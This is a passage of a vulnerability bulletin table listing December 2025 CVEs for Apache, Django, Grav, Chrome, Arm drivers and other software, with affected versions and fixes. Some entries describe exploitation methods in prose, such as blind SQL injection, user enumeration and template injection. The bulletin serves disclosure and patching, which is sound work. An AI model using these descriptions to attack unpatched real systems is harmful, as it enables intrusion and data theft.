| Apache Software Foundation--Apache HTTP Server | mod_userdir+suexec bypass via AllowOverride FileInfo vulnerability in Apache HTTP Server. Users with access to use the RequestHeader directive in htaccess can cause some CGI scripts to run under an unexpected userid. This issue affects Apache HTTP Server: from 2.4.7 through 2.4.65. Users are recommended to upgrade to version 2.4.66, which fixes the issue. | 2025-12-05 | not yet calculated | CVE-2025-66200 | https://httpd.apache.org/security/vulnerabilities_24.html |
| Apache Software Foundation--Apache Struts | Denial of Service vulnerability in Apache Struts, file leak in multipart request processing causes disk exhaustion. This issue affects Apache Struts: from 2.0.0 through 6.7.0, from 7.0.0 through 7.0.3. Users are recommended to upgrade to version 6.8.0 or 7.1.1, which fixes the issue. | 2025-12-01 | not yet calculated | CVE-2025-64775 | https://cwiki.apache.org/confluence/display/WW/S2-068 |
| Apache Software Foundation--Apache Tika core | Critical XXE in Apache Tika tika-core (1.13-3.2.1), tika-pdf-module (2.0.0-3.2.1) and tika-parsers (1.13-1.28.5) modules on all platforms allows an attacker to carry out XML External Entity injection via a crafted XFA file inside of a PDF. This CVE covers the same vulnerability as in CVE-2025-54988. However, this CVE expands the scope of affected packages in two ways. First, while the entrypoint for the vulnerability was the tika-parser-pdf-module as reported in CVE-2025-54988, the vulnerability and its fix were in tika-core. Users who upgraded the tika-parser-pdf-module but did not upgrade tika-core to >= 3.2.2 would still be vulnerable. Second, the original report failed to mention that in the 1.x Tika releases, the PDFParser was in the "org.apache.tika:tika-parsers" module. | 2025-12-04 | not yet calculated | CVE-2025-66516 | https://lists.apache.org/thread/s5x3k93nhbkqzztp1olxotoyjpdlps9k https://cve.org/CVERecord?id=CVE-2025-54988 |
| Arm Ltd--Valhall GPU Kernel Driver | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user process to perform improper GPU processing operations to expose sensitive data. This issue affects Valhall GPU Kernel Driver: from r29p0 through r49p4, from r50p0 through r54p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r49p4, from r50p0 through r54p0. | 2025-12-01 | not yet calculated | CVE-2025-2879 | https://developer.arm.com/documentation/110697/latest/ |
| Arm Ltd--Valhall GPU Kernel Driver | Use After Free vulnerability in Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user process to perform improper GPU memory processing operations to gain access to already freed memory. This issue affects Valhall GPU Kernel Driver: from r53p0 through r54p1; Arm 5th Gen GPU Architecture Kernel Driver: from r53p0 through r54p1. | 2025-12-01 | not yet calculated | CVE-2025-6349 | https://developer.arm.com/documentation/110697/latest/ |
| Arm Ltd--Valhall GPU Kernel Driver | Use After Free vulnerability in Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user process to perform improper GPU processing operations to gain access to already freed memory. This issue affects Valhall GPU Kernel Driver: from r53p0 through r54p1; Arm 5th Gen GPU Architecture Kernel Driver: from r53p0 through r54p1. | 2025-12-01 | not yet calculated | CVE-2025-8045 | https://developer.arm.com/documentation/110697/latest/ |
| Cacti--cacti | Cacti is an open source performance and fault management framework. Prior to 1.2.29, there is an input-validation flaw in the SNMP device configuration functionality. An authenticated Cacti user can supply crafted SNMP community strings containing control characters (including newlines) that are accepted, stored verbatim in the database, and later embedded into backend SNMP operations. In environments where downstream SNMP tooling or wrappers interpret newline-separated tokens as command boundaries, this can lead to unintended command execution with the privileges of the Cacti process. This vulnerability is fixed in 1.2.29. | 2025-12-02 | not yet calculated | CVE-2025-66399 | https://github.com/Cacti/cacti/security/advisories/GHSA-c7rr-2h93-7gjf |
| calcom--cal.com | Cal.com is open-source scheduling software. Prior to 5.9.8, a flaw in the login credentials provider allowed an attacker to bypass password verification when a TOTP code is provided, potentially gaining unauthorized access to user accounts. This issue exists due to problematic conditional logic in the authentication flow. This vulnerability is fixed in 5.9.8. | 2025-12-03 | not yet calculated | CVE-2025-66489 | https://github.com/calcom/cal.com/security/advisories/GHSA-9r3w-4j8q-pw98 |
| Canonical--python-apt | NULL pointer dereference in TagSection.keys() in python-apt on APT-based Linux systems allows a local attacker to cause a denial of service (process crash) via a crafted deb822 file with a malformed non-UTF-8 key. | 2025-12-05 | not yet calculated | CVE-2025-6966 | https://bugs.launchpad.net/ubuntu/+source/python-apt/+bug/2091865 |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. In ChurchCRM 6.2.0 and earlier, there is a time-based blind SQL injection in the handling of the 1FieldSec parameter. Injecting SLEEP() causes deterministic server-side delays, proving the value is incorporated into a SQL query without proper parameterization. The issue allows data exfiltration and modification via blind techniques. | 2025-12-01 | not yet calculated | CVE-2025-66313 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-47q3-c874-mqvp https://github.com/ChurchCRM/CRM/commit/719a6bc73245c40e3c30dae6229daaecd451e59f |
| Cloudflare--gokey | In gokey versions <0.2.0, a flaw in the seed decryption logic resulted in passwords incorrectly being derived solely from the initial vector and the AES-GCM authentication tag of the key seed. This issue has been fixed in gokey version 0.2.0. This is a breaking change. The fix has invalidated any passwords/secrets that were derived from the seed file (using the -s option). Even if the input seed file stays the same, version 0.2.0 gokey will generate different secrets. Impact: This vulnerability impacts generated keys/secrets using a seed file as an entropy input (using the -s option). Keys/secrets generated just from the master password (without the -s option) are not impacted. The confidentiality of the seed itself is also not impacted (it is not required to regenerate the seed itself). Specific impact includes: * keys/secrets generated from a seed file may have lower entropy: it was expected that the whole seed would be used to generate keys (240 bytes of entropy input), whereas in vulnerable versions only 28 bytes were used; * a malicious entity could have recovered all passwords generated from a particular seed, having only the seed file in possession, without knowledge of the seed master password. Patches: The code logic bug has been fixed in gokey version 0.2.0 and above. Due to the deterministic nature of gokey, fixed versions will produce different passwords/secrets using seed files, as all seed entropy will now be used. System secret rotation guidance: Users are advised to regenerate passwords/secrets using the patched version of gokey (0.2.0 and above), and provision/rotate these secrets into the respective systems in place of the old secret. A specific rotation procedure is system-dependent, but the most common patterns are described below. Systems that do not require the old password/secret for rotation: Such systems usually have a "Forgot password" facility or a similar facility allowing users to rotate their password/secrets by sending a unique "magic" link to the user's email or phone. In such cases users are advised to use this facility and input the newly generated password/secret when prompted by the system. Systems that require the old password/secret for rotation: Such systems usually have a modal password rotation window, usually in the user settings section, requiring the user to input the old and the new password, sometimes with a confirmation. To generate/recover the old password in such cases users are advised to: * temporarily download gokey version 0.1.3 (https://github.com/cloudflare/gokey/releases/tag/v0.1.3) for their respective operating system to recover the old password; * use gokey version 0.2.0 or above to generate the new password; * populate the system-provided password rotation form. Systems that allow multiple credentials for the same account to be provisioned: Such systems usually require a secret or a cryptographic key as a credential for access, but allow several credentials at the same time. One example is SSH: a particular user may have several authorized public keys configured on the SSH server for access. For such systems users are advised to: * generate a new secret/key/credential using gokey version 0.2.0 or above; * provision the new secret/key/credential in addition to the existing credential on the system; * verify that the access or required system operation is still possible with the new secret/key/credential; * revoke authorization for the existing/old credential from the system. Credit: This vulnerability was found by Théo Cusnir (@mister_mime, https://hackerone.com/mister_mime) and responsibly disclosed through Cloudflare's bug bounty program. | 2025-12-02 | not yet calculated | CVE-2025-13353 | https://github.com/cloudflare/gokey/security/advisories/GHSA-69jw-4jj8-fcxm |
| CollaboraOnline--online | Collabora Online - Built-in CODE Server (richdocumentscode) provides a built-in server with all of the document editing features of Collabora Online. In versions prior to 25.04.702, Collabora Online has a Configuration-Dependent RCE (OS Command Injection) in richdocumentscode proxy. Users of Nextcloud with Collabora Online - Built-in CODE Server app can be vulnerable to attack via proxy.php and an intermediate reverse proxy. This vulnerability is fixed in 25.04.702. | 2025-12-03 | not yet calculated | CVE-2025-66208 | https://github.com/CollaboraOnline/online/security/advisories/GHSA-j3q6-q5pc-v5wf |
| ColorOS--ColorOS | A flaw exists in the verification of application installation sources within ColorOS. Under specific conditions, this issue may cause the risk detection mechanism to fail, which could allow malicious applications to be installed without proper warning. | 2025-12-05 | not yet calculated | CVE-2025-27389 | https://security.oppo.com/en/noticeDetail?notice_only_key=NOTICE-1996493715665068032 |
| Compass Plus Technologies--TranzAxis | TranzAxis 3.2.41.10.26 allows authenticated users to inject cross-site scripting via the `Open Object in Tree` endpoint, allowing attackers to steal session cookies and potentially escalate privileges. | 2025-12-04 | not yet calculated | CVE-2025-66574 | ExploitDB-52086 Compass Technologies Homepage https://www.vulncheck.com/advisories/tranzaxis-32411026-stored-cross-site-scripting-xss |
| Data Illusion Zumbrunn--NGSurvey | Incorrect Authorization vulnerability in Data Illusion Zumbrunn NGSurvey allows any logged-in user to obtain the private information of any other user. Critical information retrieved: * APIKEY (1 year user Session) * RefreshToken (10 minutes user Session) * Password hashed with bcrypt * User IP * Email * Full Name | 2025-12-01 | not yet calculated | CVE-2025-13829 | https://docs.ngsurvey.com/installation-setup/change-log#id-3.6.17-2025-05-28 |
| djangoproject--Django | An issue was discovered in 5.2 before 5.2.9, 5.1 before 5.1.15, and 4.2 before 4.2.27. `FilteredRelation` is subject to SQL injection in column aliases, using a suitably crafted dictionary, with dictionary expansion, as the `**kwargs` passed to `QuerySet.annotate()` or `QuerySet.alias()` on PostgreSQL. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Stackered for reporting this issue. | 2025-12-02 | not yet calculated | CVE-2025-13372 | Django security archive Django releases announcements Django security releases issued: 5.2.9, 5.1.15, and 4.2.27 |
| djangoproject--Django | An issue was discovered in 5.2 before 5.2.9, 5.1 before 5.1.15, and 4.2 before 4.2.27. Algorithmic complexity in `django.core.serializers.xml_serializer.getInnerText()` allows a remote attacker to cause a potential denial-of-service attack triggering CPU and memory exhaustion via specially crafted XML input processed by the XML `Deserializer`. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Seokchan Yoon for reporting this issue. | 2025-12-02 | not yet calculated | CVE-2025-64460 | Django security archive Django releases announcements Django security releases issued: 5.2.9, 5.1.15, and 4.2.27 |
| docker--mcp-gateway | MCP Gateway allows easy and secure running and deployment of MCP servers. In versions 0.27.0 and earlier, when MCP Gateway runs in sse or streaming transport mode, it is vulnerable to DNS rebinding. An attacker who can get a victim to visit a malicious website or be served a malicious advertisement can perform browser-based exploitation of MCP servers executing behind the gateway, including manipulating tools or other features exposed by those MCP servers. MCP Gateway is not affected when running in the default stdio mode, which does not listen on network ports. Version 0.28.0 fixes this issue. | 2025-12-03 | not yet calculated | CVE-2025-64443 | https://github.com/docker/mcp-gateway/security/advisories/GHSA-46gc-mwh4-cc5r https://github.com/docker/mcp-gateway/commit/6b076b2479d8d1345c50c112119c62978d46858e |
| Duc--Duc | A stack buffer overflow vulnerability exists in the buffer_get function of duc, a disk management tool, where a condition can evaluate to true due to underflow, allowing an out-of-bounds read. | 2025-12-05 | not yet calculated | CVE-2025-13654 | https://github.com/zevv/duc/releases/tag/1.4.6 https://kb.cert.org/vuls/id/441887 https://hackingbydoing.wixsite.com/hackingbydoing/post/stack-buffer-overflow-in-duc |
| Eclipse Foundation--paho.mqtt.golang (Go MQTT v3.1 library) | In Eclipse Paho Go MQTT v3.1 library (paho.mqtt.golang) versions <=1.5.0 UTF-8 encoded strings, passed into the library, may be incorrectly encoded if their length exceeds 65535 bytes. This may lead to unexpected content in packets sent to the server (for example, part of an MQTT topic may leak into the message body in a PUBLISH packet). The issue arises because the length of the data passed in was converted from an int64/int32 (depending upon CPU) to an int16 without checks for overflows. The int16 length was then written, followed by the data (e.g. topic). This meant that when the data (e.g. topic) was over 65535 bytes then the amount of data written exceeds what the length field indicates. This could lead to a corrupt packet, or mean that the excess data leaks into another field (e.g. topic leaks into message body). | 2025-12-02 | not yet calculated | CVE-2025-10543 | https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/254 |
| espressif--esp-idf | ESP-IDF is the Espressif Internet of Things (IoT) Development Framework. In 5.5.1, 5.4.3, 5.3.4, 5.2.6, 5.1.6, and earlier, when AVRCP is enabled on ESP32, receiving a malformed VENDOR DEPENDENT command from a peer device can cause the Bluetooth stack to access memory before validating the command buffer length. This may lead to an out-of-bounds read, potentially exposing unintended memory content or causing unexpected behavior. | 2025-12-02 | not yet calculated | CVE-2025-66409 | https://github.com/espressif/esp-idf/security/advisories/GHSA-qhf9-vr2h-jh96 https://github.com/espressif/esp-idf/commit/075ed218cadb8088155521cd8a795d8a626519fb https://github.com/espressif/esp-idf/commit/2f788e59ee361eee230879ae2ec9cf5c893fe372 https://github.com/espressif/esp-idf/commit/798029129a71c802cff0e75eb59f902bca8f1946 https://github.com/espressif/esp-idf/commit/999710fccf95ae128fe51b5679d6b7c75c50d902 https://github.com/espressif/esp-idf/commit/d5db5f60fc1dcfdd8cd3ee898fdefaa272988ace https://github.com/espressif/esp-idf/commit/daeeba230327176b9627b1caa94acdc54065c4b7 |
| ESTsoft--ALZip | Protection Mechanism Failure vulnerability in ESTsoft ALZip on Windows allows SmartScreen bypass. This issue affects ALZip: from 12.01 before 12.29. | 2025-12-03 | not yet calculated | CVE-2025-29864 | https://altools.co.kr/product/ALZIP |
| fastify--fastify-reply-from | fastify-reply-from is a Fastify plugin to forward the current HTTP request to another server. Prior to 12.5.0, by crafting a malicious URL, an attacker could access routes that are not allowed, even though the reply.from is defined for specific routes in @fastify/reply-from. This vulnerability is fixed in 12.5.0. | 2025-12-01 | not yet calculated | CVE-2025-66415 | https://github.com/fastify/fastify-reply-from/security/advisories/GHSA-2q7r-29rg-6m5h https://github.com/fastify/fastify-reply-from/commit/4d9795cd5b57a36756d37b7f036eae369f69fa66 |
| FERMAX ELECTRÓNICA S.A.U--MeetMe | Insecure Storage of Sensitive Information vulnerability in MeetMe on iOS, Android allows Retrieve Embedded Sensitive Data. This issue affects MeetMe: through v2.2.5. | 2025-12-02 | not yet calculated | CVE-2025-10971 | https://www.fermax.com/security-advisories |
| Flexsense--DiskBoss | Flexsense DiskBoss 11.7.28 allows unauthenticated attackers to elevate their privileges using any of its services, enabling remote code execution during startup or reboot with escalated privileges. Attackers can exploit the unquoted service path vulnerability by specifying a malicious service name in the 'sc qc' command, allowing them to execute arbitrary system commands. | 2025-12-05 | not yet calculated | CVE-2020-36879 | Exploit Database Entry 49022 DiskBoss Homepage DiskBoss Software Link https://www.vulncheck.com/advisories/flexsense-diskboss-service-unquoted-service-path-vulnerability |
| Flexsense--DiskBoss | Flexsense DiskBoss 7.7.14 contains a local buffer overflow vulnerability in the 'Reports and Data Directory' field that allows an attacker to execute arbitrary code on the system. | 2025-12-05 | not yet calculated | CVE-2020-36880 | Exploit Database Entry 48689 Reference https://www.vulncheck.com/advisories/flexsense-diskboss-reports-and-data-directory-buffer-overflow |
| Flexsense--DiskBoss | Flexsense DiskBoss 7.7.14 contains a local buffer overflow vulnerability in the 'Input Directory' component that allows unauthenticated attackers to execute arbitrary code on the system. Attackers can exploit this by pasting a specially crafted directory path into the 'Add Input Directory' field. | 2025-12-05 | not yet calculated | CVE-2020-36881 | Exploit Database Entry 48279 Official Product Homepage Software Link Download GitHub Repository https://www.vulncheck.com/advisories/flexsense-diskboss-add-input-directory-buffer-overflow |
| Flexsense--DiskBoss | Flexsense DiskBoss 7.7.14 allows unauthenticated attackers to upload arbitrary files via /Command/Search Files/Directory field, leading to a denial of service by crashing the application. | 2025-12-05 | not yet calculated | CVE-2020-36882 | Exploit Database Entry 48276 Official Vendor Homepage Software Download Link https://www.vulncheck.com/advisories/flexsense-diskboss-denial-of-service-by-crashing-the-application |
| flipped-aurora--gin-vue-admin | Gin-vue-admin is a backstage management system based on vue and gin. In 2.8.6 and earlier, attackers can delete any file on the server at will, causing damage or unavailability of server resources. Attackers can control the 'FileMd5' parameter to delete any file and folder. | 2025-12-01 | not yet calculated | CVE-2025-66410 | https://github.com/flipped-aurora/gin-vue-admin/security/advisories/GHSA-jrhg-82w2-vvj7 https://github.com/flipped-aurora/gin-vue-admin/commit/ee8d8d7e04d9c38a35a6969f20e75213e84f57c6 |
| frappe--lms | Frappe Learning Management System (LMS) is a learning system that helps users structure their content. Prior to 2.41.0, a flaw in the server-side authorization logic allowed authenticated users to perform actions beyond their assigned roles across multiple features. Because the affected endpoints relied on client-side or UI-level checks instead of enforcing permissions on the server, users with low-privileged roles (such as students) could perform operations intended only for instructors or administrators by directly using the APIs. This vulnerability is fixed in 2.41.0. | 2025-12-05 | not yet calculated | CVE-2025-66581 | https://github.com/frappe/lms/security/advisories/GHSA-2ch7-c74m-432m |
| FreePBX--security-reporting | Summary: Authenticated SQL Injection Vulnerability in Endpoint Module Rest API | 2025-12-03 | not yet calculated | CVE-2025-62173 | https://github.com/FreePBX/security-reporting/security/advisories/GHSA-q3h9-fmpr-vpfw |
| getgrav--grav | Grav is a file-based Web platform. Prior to 1.8.0-beta.27, a Server-Side Template Injection (SSTI) vulnerability exists in Grav that allows authenticated attackers with editor permissions to execute arbitrary commands on the server and, under certain conditions, may also be exploited by unauthenticated attackers. This vulnerability stems from weak regex validation in the cleanDangerousTwig method. This vulnerability is fixed in 1.8.0-beta.27. | 2025-12-01 | not yet calculated | CVE-2025-66294 | https://github.com/getgrav/grav/security/advisories/GHSA-662m-56v4-3r8f https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458 |
| getgrav--grav | Grav is a file-based Web platform. Prior to 1.8.0-beta.27, a user with admin panel access and permissions to create or edit pages in Grav CMS can enable Twig processing in the page frontmatter. By injecting malicious Twig expressions, the user can escalate their privileges to admin or execute arbitrary system commands via the scheduler API. This results in both Privilege Escalation (PE) and Remote Code Execution (RCE) vulnerabilities. This vulnerability is fixed in 1.8.0-beta.27. | 2025-12-01 | not yet calculated | CVE-2025-66297 | https://github.com/getgrav/grav/security/advisories/GHSA-858q-77wx-hhx6 https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458 |
| getgrav--grav | Grav is a file-based Web platform. Prior to 1.8.0-beta.27, having a simple form on site can reveal the whole Grav configuration details (including plugin configuration details) by using the correct POST payload to exploit a Server-Side Template (SST) vulnerability. Sensitive information may be contained in the configuration details. This vulnerability is fixed in 1.8.0-beta.27. | 2025-12-01 | not yet calculated | CVE-2025-66298 | https://github.com/getgrav/grav/security/advisories/GHSA-8535-hvm8-2hmv https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458 |
| getgrav--grav | Grav is a file-based Web platform. Prior to 1.8.0-beta.27, due to improper authorization checks when modifying critical fields on a POST request to /admin/pages/{page_name}, an editor with only permissions to change basic content on the form is able to change the functioning of the form by modifying the content of data[_json][header][form]. This is the YAML frontmatter, which includes the process section that dictates what happens after a user submits the form, including some important actions that could lead to further vulnerabilities. This vulnerability is fixed in 1.8.0-beta.27. | 2025-12-01 | not yet calculated | CVE-2025-66301 | https://github.com/getgrav/grav/security/advisories/GHSA-v8x2-fjv7-8hjh |
| getgrav--grav | Grav is a file-based Web platform. Prior to 1.8.0-beta.27, a Denial of Service (DoS) vulnerability was identified in the "Languages" submenu of the Grav admin configuration panel (/admin/config/system). Specifically, the Supported parameter fails to properly validate user input. If a malformed value is inserted, such as a single forward slash (/) or an XSS test string, it causes a fatal regular expression parsing error on the server. This leads to application-wide failure due to the use of the preg_match() function with an improperly constructed regular expression, resulting in an error. Once triggered, the site becomes completely unavailable to all users. This vulnerability is fixed in 1.8.0-beta.27. | 2025-12-01 | not yet calculated | CVE-2025-66305 | https://github.com/getgrav/grav/security/advisories/GHSA-m8vh-v6r6-w7p6 https://github.com/getgrav/grav/commit/ed640a13143c4177af013cf001969ed2c5e197ee |
| getgrav--grav | This admin plugin for Grav is an HTML user interface that provides a convenient way to configure Grav and easily create and modify pages. Prior to 1.11.0-beta.1, a Stored Cross-Site Scripting (XSS) vulnerability was identified in the /admin/config/site endpoint of the Grav application. This vulnerability allows attackers to inject malicious scripts into the data[taxonomies] parameter. The injected payload is stored on the server and automatically executed in the browser of any user who accesses the affected site configuration, resulting in a persistent attack vector. This vulnerability is fixed in 1.11.0-beta.1. | 2025-12-01 | not yet calculated | CVE-2025-66308 | https://github.com/getgrav/grav/security/advisories/GHSA-gqxx-248x-g29f https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0 |
| getgrav--grav | This admin plugin for Grav is an HTML user interface that provides a convenient way to configure Grav and easily create and modify pages. Prior to 1.11.0-beta.1, a Reflected Cross-Site Scripting (XSS) vulnerability was identified in the /admin/pages/[page] endpoint of the Grav application. This vulnerability allows attackers to inject malicious scripts into the data[header][content][items] parameter. This vulnerability is fixed in 1.11.0-beta.1. | 2025-12-01 | not yet calculated | CVE-2025-66309 | https://github.com/getgrav/grav/security/advisories/GHSA-65mj-f7p4-wggq https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0 |
| getgrav--grav | This admin plugin for Grav is an HTML user interface that provides a convenient way to configure Grav and easily create and modify pages. Prior to 1.11.0-beta.1, a Stored Cross-Site Scripting (XSS) vulnerability was identified in the /admin/pages/[page] endpoint of the Grav application. This vulnerability allows attackers to inject malicious scripts into the data[header][template] parameter. The script is saved within the page's frontmatter and executed automatically whenever the affected content is rendered in the administrative interface or frontend view. This vulnerability is fixed in 1.11.0-beta.1. | 2025-12-01 | not yet calculated | CVE-2025-66310 | https://github.com/getgrav/grav/security/advisories/GHSA-7g78-5g5g-mvfj https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0 |
| getgrav--grav | This admin plugin for Grav is an HTML user interface that provides a convenient way to configure Grav and easily create and modify pages. Prior to 1.11.0-beta.1, a Stored Cross-Site Scripting (XSS) vulnerability was identified in the /admin/pages/[page] endpoint of the Grav application. This vulnerability allows attackers to inject malicious scripts into the data[header][metadata], data[header][taxonomy][category], and data[header][taxonomy][tag] parameters. These scripts are stored in the page frontmatter and executed automatically whenever the affected page is accessed or rendered in the administrative interface. This vulnerability is fixed in 1.11.0-beta.1. | 2025-12-01 | not yet calculated | CVE-2025-66311 | https://github.com/getgrav/grav/security/advisories/GHSA-mpjj-4688-3fxg https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0 |
| getgrav--grav | This admin plugin for Grav is an HTML user interface that provides a convenient way to configure Grav and easily create and modify pages. Prior to 1.11.0-beta.1, a Stored Cross-Site Scripting (XSS) vulnerability was identified in the /admin/accounts/groups/Grupo endpoint of the Grav application. This vulnerability allows attackers to inject malicious scripts into the data[readableName] parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk. This vulnerability is fixed in 1.11.0-beta.1. | 2025-12-01 | not yet calculated | CVE-2025-66312 | https://github.com/getgrav/grav/security/advisories/GHSA-rmw5-f87r-w988 https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0 |
| Go standard library--crypto/x509 | An excluded subdomain constraint in a certificate chain does not restrict the usage of wildcard SANs in the leaf certificate. For example a constraint that excludes the subdomain test.example.com does not prevent a leaf certificate from claiming the SAN *.example.com. | 2025-12-03 | not yet calculated | CVE-2025-61727 | https://go.dev/cl/723900 https://go.dev/issue/76442 https://groups.google.com/g/golang-announce/c/8FJoBkPddm4 https://pkg.go.dev/vuln/GO-2025-4175 |
| Go standard library--crypto/x509 | Within HostnameError.Error(), when constructing an error string, there is no limit to the number of hosts that will be printed out. Furthermore, the error string is constructed by repeated string concatenation, leading to quadratic runtime. Therefore, a certificate provided by a malicious actor can result in excessive resource consumption. | 2025-12-02 | not yet calculated | CVE-2025-61729 | https://go.dev/cl/725920 https://go.dev/issue/76445 https://groups.google.com/g/golang-announce/c/8FJoBkPddm4 https://pkg.go.dev/vuln/GO-2025-4155 |
| Google Cloud--Apigee hybrid Javacallout policy | A vulnerability exists in Google Apigee's JavaCallout policy https://docs.apigee.com/api-platform/reference/policies/java-callout-policy that allows for remote code execution. It is possible for a user to write a JavaCallout that injects a malicious object into the MessageContext to execute arbitrary Java code and system commands at runtime, leading to unauthorized access to data, lateral movement within the network, and access to backend systems. The Apigee hybrid versions below have all been updated to protect from this vulnerability: * Hybrid_1.11.2+ * Hybrid_1.12.4+ * Hybrid_1.13.3+ * Hybrid_1.14.1+ * OPDK_5202+ * OPDK_5300+ | 2025-12-05 | not yet calculated | CVE-2025-13426 | https://docs.cloud.google.com/apigee/docs/hybrid/release-notes#March_01_2025 |
| Google Cloud--Apigee-X | A vulnerability in Apigee-X allowed an attacker to gain unauthorized read and write access to Apigee Analytics (AX) data and access logs belonging to other Apigee customer organizations. Apigee-X was found to be vulnerable. This vulnerability was patched in version 1-16-0-apigee-3. No user action is required for this. | 2025-12-06 | not yet calculated | CVE-2025-13292 | https://docs.cloud.google.com/apigee/docs/release-notes#October_16_2025 |
| Google--Chrome | Type Confusion in V8 in Google Chrome prior to 143.0.7499.41 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2025-12-02 | not yet calculated | CVE-2025-13630 | |
| Google--Chrome | Inappropriate implementation in Google Updater in Google Chrome on Mac prior to 143.0.7499.41 allowed a remote attacker to perform privilege escalation via a crafted file. (Chromium security severity: High) | 2025-12-02 | not yet calculated | ||
| Google--Chrome | Inappropriate implementation in DevTools in Google Chrome prior to 143.0.7499.41 allowed an attacker who convinced a user to install a malicious extension to potentially perform a sandbox escape via a crafted Chrome Extension. (Chromium security severity: High) | 2025-12-02 | not yet calculated | CVE-2025-13632 | |
| Google--Chrome | Use after free in Digital Credentials in Google Chrome prior to 143.0.7499.41 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2025-12-02 | not yet calculated | CVE-2025-13633 | |
| Google--Chrome | Inappropriate implementation in Downloads in Google Chrome on Windows prior to 143.0.7499.41 allowed a local attacker to bypass mark of the web via a crafted HTML page. (Chromium security severity: Medium) | 2025-12-02 | not yet calculated | CVE-2025-13634 | |
| Google--Chrome | Inappropriate implementation in Downloads in Google Chrome prior to 143.0.7499.41 allowed a local attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2025-12-02 | not yet calculated | CVE-2025-13635 | |
| Google--Chrome | Inappropriate implementation in Split View in Google Chrome prior to 143.0.7499.41 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted domain name. (Chromium security severity: Low) | 2025-12-02 | not yet calculated | CVE-2025-13636 | |
| Google--Chrome | Inappropriate implementation in Downloads in Google Chrome prior to 143.0.7499.41 allowed a remote attacker who convinced a user to engage in specific UI gestures to bypass download protections via a crafted HTML page. (Chromium security severity: Low) | 2025-12-02 | not yet calculated | CVE-2025-13637 | |
| Google--Chrome | Use after free in Media Stream in Google Chrome prior to 143.0.7499.41 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Low) | 2025-12-02 | not yet calculated | CVE-2025-13638 | |
| Google--Chrome | Inappropriate implementation in WebRTC in Google Chrome prior to 143.0.7499.41 allowed a remote attacker to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: Low) | 2025-12-02 | not yet calculated | CVE-2025-13639 | |
| Google--Chrome | Inappropriate implementation in Passwords in Google Chrome prior to 143.0.7499.41 allowed a local attacker to bypass authentication via physical access to the device. (Chromium security severity: Low) | 2025-12-02 | not yet calculated | CVE-2025-13640 | |
| Google--Chrome | Bad cast in Loader in Google Chrome prior to 143.0.7499.41 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium) | 2025-12-02 | not yet calculated | CVE-2025-13720 | |
| Google--Chrome | Race in v8 in Google Chrome prior to 143.0.7499.41 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium) | 2025-12-02 | not yet calculated | CVE-2025-13721 | |
| Google--Chrome | Side-channel information leakage in Navigation and Loading in Google Chrome prior to 139.0.7258.66 allowed a remote attacker to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium) | 2025-12-03 | not yet calculated | CVE-2025-13992 | |
| Horde--Groupware | Horde Groupware v5.2.22 has a user enumeration vulnerability that allows an unauthenticated attacker to determine the existence of valid accounts on the system. To exploit the vulnerability, an HTTP request must be sent to '/imp/attachment.php' including the parameters 'id' and 'u'. If the specified user exists, the server will return the download of an empty file; if it does not exist, no download will be initiated, which unequivocally reveals the validity of the user. | 2025-12-02 | not yet calculated | CVE-2025-41066 | https://www.incibe.es/en/incibe-cert/notices/aviso/disclosure-sensitive-information-horde-groupware |
| HP Inc--HP Image Assistant | A potential security vulnerability has been identified in HP Image Assistant for versions prior to 5.3.3. The vulnerability could potentially allow a local attacker to escalate privileges via a race condition when installing packages. | 2025-12-03 | not yet calculated | CVE-2025-13492 | https://support.hp.com/us-en/document/ish_13505078-13505143-16/hpsbgn04078 |
| IDI Eikon--Governalia | Reflected Cross-Site Scripting (XSS) in IDI Eikon's Governalia. The vulnerability allows an attacker to execute JavaScript code in the victim's browser when a malicious URL with the 'q' parameter in '/search' is sent to them. This vulnerability can be exploited to steal sensitive information such as session cookies or to perform actions on behalf of the victim. | 2025-12-02 | not yet calculated | CVE-2025-40700 | https://www.incibe.es/en/incibe-cert/notices/aviso/reflected-cross-site-scripting-xss-governalia-idi-eikon https://governalia.es/ |
